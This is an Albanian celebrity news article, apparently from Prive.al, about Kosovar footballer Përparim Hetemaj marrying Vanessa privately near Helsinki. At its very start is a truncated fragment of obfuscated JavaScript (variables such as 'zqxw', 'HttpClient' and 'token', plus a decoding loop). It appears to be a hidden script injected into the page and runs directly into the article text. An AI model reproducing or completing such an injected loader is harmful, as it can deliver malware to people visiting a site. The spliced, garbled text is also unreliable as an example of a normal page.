;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Martohet futbollisti kosovar Përparim Hetemaj

By

2016-ta ndryshoi statusin e shumë futbollistëve shqiptarë në botë që vendosën të kurorëzojnë dashurinë.

Nga Shkodran Mustafi tek Admir Mehmedi e emra të tjerë, pa shumë zhurmë dhe në privatësi të plotë, i dhanë fund beqarisë.

E duket që një trend i ngjajshëm do jetë edhe në verën e këtij viti.

I pari që ka nisur siparin e dasmave është futbollisti kosovar Përparim Hetemaj i cili jeton në Finlandë.

30 vjeçari nga Skënderaj, në shtetin finlandez ka kurorëzuar dashurinë me Vanessa Janatunien në nje ceremoni private dhe të vogël në periferi të Helsinkit.

Ndonëse mesfushori i Chievos nuk ka postuar fotografi nga ky event i madh jetësor, Prive.al ka arritur t’i sigurojë disa prej tyre të cilat ua sjellim më poshtë.

Ndryshe, Vanessa dhe Përparimi ishin fejuar në Skënderaj me 1 Korrik 2015 teksa nuk dihet nëse do ketë dasëm edhe në Drenicë. /Prive.al/

Artikuj të ngjashëm